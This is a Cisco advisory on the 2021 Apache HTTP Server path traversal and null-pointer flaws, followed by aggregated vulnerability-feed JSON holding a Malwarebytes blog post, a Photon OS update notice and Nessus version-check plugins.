On October 5, 2021 and October 7, 2021, the Apache Software Foundation released two security announcements for the Apache HTTP Server that disclosed the following vulnerabilities:
CVE-2021-41524: Null Pointer Dereference Vulnerability
CVE-2021-41773: Path Traversal and Remote Code Execution Vulnerability
CVE-2021-42013: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)
For descriptions of these vulnerabilities, see the Apache Security Announcement (https://httpd.apache.org/security/vulnerabilities_24.html). For additional information, see the Cisco TALOS blog post, "Threat Advisory: Apache HTTP Server zero-day vulnerability opens door for attackers" (https://blog.talosintelligence.com/2021/10/apache-vuln-threat-advisory.html).
Cisco investigated its product line and concluded that no Cisco products are affected by these vulnerabilities.
{"photon": [{"lastseen": "2022-05-12T18:54:18", "description": "Updates of ['httpd'] packages of Photon OS have been released.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-19T00:00:00", "type": "photon", "title": "Critical Photon OS Security Update - PHSA-2021-0118", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-19T00:00:00", "id": "PHSA-2021-0118", "href": "https://github.com/vmware/photon/wiki/Security-Update-4.0-118", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "malwarebytes": [{"lastseen": "2021-10-13T10:35:39", "description": "The Apache HTTP Server 2.4.49 is vulnerable to a flaw that allows attackers to use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. 
This issue is known to be exploited in the wild.\n\n### The vulnerability\n\nThe Apache HTTP Server Project started out as an effort to develop and maintain an open-source HTTP server for modern operating systems, including UNIX and Windows. It provides a secure, efficient, and extensible server that provides HTTP services in sync with the current HTTP standards.\n\nThe flaw (listed as [CVE-2021-41773](<https://nvd.nist.gov/vuln/detail/CVE-2021-41773>)) was introduced by a change made to path normalization in Apache HTTP Server 2.4.49. So, earlier versions are not vulnerable, nor are servers that are configured to "require all denied". \n\nUnfortunately, \u201crequire all denied\u201d is off in the default configuration. This is the setting that typically shows an error that looks like this:\n\n_ "Forbidden. You don't have permission to access {path}."_\n\n### Path traversal attack\n\nPath traversal attacks are done by sending requests to access backend or sensitive server directories that should be out of reach for unauthorized users. While normally these requests are blocked, the vulnerability allows an attacker to bypass the filters by using encoded characters (ASCII) for the URLs.\n\nUsing this method an attacker could gain access to files like cgi scripts that are active on the server, which could potentially reveal configuration details that could be used in further attacks.\n\n### Impact\n\nThe Apache HTTP Server Project was launched in 1995, and it's been the most popular web server on the Internet since April 1996. In August 2021 there were some 49 million active sites running on Apache server. 
Obviously we do not know which server every domain is using, but of the sites where we can identify the web server, Apache is used by 30.9%.\n\nA [Shodan search by Bleeping Computer](<https://www.bleepstatic.com/images/news/u/1220909/Code%20and%20Details/apache_number.jpg> \"\" ) showed that there are over a hundred thousand Apache HTTP Server 2.4.49 deployments online, many of which could be vulnerable to exploitation.\n\nSecurity researchers have warned that admins should patch immediately.\n\n> If you use Apache HTTP Server 2.4.49 (only that version), you should update to 2.4.50 now due to CVE-2021-41773, a nasty 0-day path traversal vulnerability <https://t.co/2QiV4h77B4>\n> \n> -- Mark J Cox (@iamamoose) [October 5, 2021](<https://twitter.com/iamamoose/status/1445304838963830784?ref_src=twsrc%5Etfw>)\n\n### Another vulnerability\n\nThere's a second vulnerability tackled by this patch\u2014[CVE-2021-41524](<https://nvd.nist.gov/vuln/detail/CVE-2021-41524>)\u2014a null pointer dereference detected during HTTP/2 request processing. This flaw allows an attacker to perform a denial of service (DoS) attack on the server. This requires a specially crafted request.\n\nThis flaw also only exists in Apache Server version 2.4.49, but is different to the first vulnerability in that, as far as we know, it is not under active exploitation. 
It was discovered three weeks ago, fixed late last month, and incorporated now in version 2.4.50.\n\n### Mitigation\n\nAll users should install the latest version as soon as possible, but:\n\n * Users that have not installed 2.4.49 yet should skip this version in their update cycle and go straight to 2.4.50.\n * Users that have 2.4.49 installed should configure \u201crequire all denied\u201d if they do not plan to patch quickly, since this blocks the attack that has been seen in the wild.\n\nA full list of vulnerabilities in Apache HTTP Server 2.4 can be found [here](<https://httpd.apache.org/security/vulnerabilities_24.html>).\n\n## Update, October 8 \n\nApache has issued a new patch. According to the release notes for version 2.4.51\u2026\n\n> \u2026the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nThe new part of the vulnerability is listed under [CVE-2021-42013](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013>). The "require all denied" setting blocks attacks using this vulnerability as well. 
Time to patch the patch.\n\nStay safe, everyone!\n\nThe post [[Updated, again] Apache fixes zero-day vulnerability in HTTP Server](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "cvss3": {}, "published": "2021-10-06T14:23:08", "type": "malwarebytes", "title": "[Updated, again] Apache fixes zero-day vulnerability in HTTP Server", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773", "CVE-2021-42013"], "modified": "2021-10-06T14:23:08", "id": "MALWAREBYTES:916ADA06F0F0B2E4CCBAE56C7FEA87D1", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/10/apache-http/", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}], "nessus": [{"lastseen": "2023-01-11T14:56:39", "description": "The Apache http server project reports :\n\n- moderate: NULL pointer dereference in h2 fuzzing (CVE-2021-41524)\n\n- important: Path traversal and file disclosure vulnerability in Apache HTTP Server 2.4.49 (CVE-2021-41773)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Multiple vulnerabilities (25b78bdd-25b8-11ec-a341-d4c9ef517024)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, 
"vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_25B78BDD25B811ECA341D4C9EF517024.NASL", "href": "https://www.tenable.com/plugins/nessus/153894", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153894);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-41524\", \"CVE-2021-41773\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Multiple vulnerabilities (25b78bdd-25b8-11ec-a341-d4c9ef517024)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\n- moderate: NULL pointer dereference in h2 fuzzing (CVE-2021-41524)\n\n- important: Path traversal and file disclosure vulnerability in\nApache HTTP Server 2.4.49 (CVE-2021-41773)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n # https://vuxml.freebsd.org/freebsd/25b78bdd-25b8-11ec-a341-d4c9ef517024.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86b69035\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n 
script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41773\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/05\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/05\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/06\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:apache24\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"apache24>=2.4.49<2.4.50\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49. It is, therefore, affected by multiple vulnerabilities:\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project. (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. 
(CVE-2021-41773) Note that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-06T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.50 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113014", "href": "https://www.tenable.com/plugins/was/113014", "sourceData": "No source data", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:57:15", "description": "The version of Apache httpd installed on the remote host is 2.4.49. It is, therefore, affected by multiple vulnerabilities as referenced in the 2.4.50 advisory.\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request processing, allowing an external source to DoS the server. This requires a specially crafted request. 
The vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by require all denied these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in the wild. This issue only affects Apache 2.4.49 and not earlier versions. (CVE-2021-41773)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-10-05T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.50 Multiple Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41524", "CVE-2021-41773"], "modified": "2022-12-05T00:00:00", "cpe": ["cpe:/a:apache:http_server", "cpe:/a:apache:httpd"], "id": "APACHE_2_4_50.NASL", "href": 
"https://www.tenable.com/plugins/nessus/153884", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153884);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\"CVE-2021-41524\", \"CVE-2021-41773\");\n script_xref(name:\"IAVA\", value:\"2021-A-0451-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0046\");\n\n script_name(english:\"Apache 2.4.49 < 2.4.50 Multiple Vulnerabilities\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Apache httpd installed on the remote host is 2.4.49. It is, therefore, affected by multiple\nvulnerabilities as referenced in the 2.4.50 advisory.\n\n - While fuzzing the 2.4.49 httpd, a new null pointer dereference was detected during HTTP/2 request\n processing, allowing an external source to DoS the server. This requires a specially crafted request. The\n vulnerability was recently introduced in version 2.4.49. No exploit is known to the project.\n (CVE-2021-41524)\n\n - A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49. An attacker could\n use a path traversal attack to map URLs to files outside the expected document root. If files outside of\n the document root are not protected by require all denied these requests can succeed. Additionally this\n flaw could leak the source of interpreted files like CGI scripts. This issue is known to be exploited in\n the wild. This issue only affects Apache 2.4.49 and not earlier versions. 
(CVE-2021-41773)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://httpd.apache.org/security/vulnerabilities_24.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Apache version 2.4.50 or later.\");\n script_set_attribute(attribute:\"agent\", value:\"all\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-41773\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache 2.4.49/2.4.50 Traversal RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:\"CANVAS\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/10/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/10/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/10/05\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:http_server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:apache:httpd\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n 
script_family(english:\"Web Servers\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"apache_http_version.nasl\", \"apache_http_server_nix_installed.nbin\", \"apache_httpd_win_installed.nbin\");\n script_require_keys(\"installed_sw/Apache\");\n\n exit(0);\n}\n\ninclude('vcf.inc');\ninclude('vcf_extras.inc');\n\nvar app_info = vcf::apache_http_server::combined_get_app_info(app:'Apache');\n\nvar constraints = [\n { 'min_version':'2.4.49', 'fixed_version' : '2.4.50' }\n];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_WARNING);\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2023-01-11T14:56:07", "description": "According to its banner, the version of Apache running on the remote host is 2.4.49 or 2.4.50. It is, therefore, affected by a path traversal vulnerability. The fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. 
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nNote that the scanner has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-08T00:00:00", "type": "nessus", "title": "Apache 2.4.49 < 2.4.51 Path Traversal", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-10-26T00:00:00", "cpe": ["cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*"], "id": "WEB_APPLICATION_SCANNING_113015", "href": "https://www.tenable.com/plugins/was/113015", "sourceData": "No source data", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-11T14:57:22", "description": "The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP Server 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773) (CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP Server 2.4.50 was insufficient. 
An attacker could use a path traversal attack to map URLs to files outside the directories configured by Alias-like directives.\n\nIf files outside of these directories are not protected by the usual default configuration 'require all denied', these requests can succeed. If CGI scripts are also enabled for these aliased pathes, this could allow for remote code execution.\n\nThis issue only affects Apache 2.4.49 and Apache 2.4.50 and not earlier versions.\n\nAcknowledgements: Reported by Juan Escobar from Dreamlab Technologies, Fernando Munoz from NULL Life CTF Team, and Shungo Kumasaka", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-11T00:00:00", "type": "nessus", "title": "FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-41773", "CVE-2021-42013"], "modified": "2022-08-31T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:apache24", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_D001C189279311EC8FB1206A8A720317.NASL", "href": "https://www.tenable.com/plugins/nessus/153983", 
"sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2021 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(153983);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/08/31\");\n\n script_cve_id(\"CVE-2021-42013\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/11/17\");\n\n script_name(english:\"FreeBSD : Apache httpd -- Path Traversal and Remote Code Execution (d001c189-2793-11ec-8fb1-206a8a720317)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote FreeBSD host is missing a security-related update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Apache http server project reports :\n\ncritical: Path Traversal and Remote Code Execution in Apache HTTP\nServer 2.4.49 and 2.4.50 (incomplete fix of CVE-2021-41773)\n(CVE-2021-42013).\n\nIt was found that the fix for CVE-2021-41773 in Apache HTTP 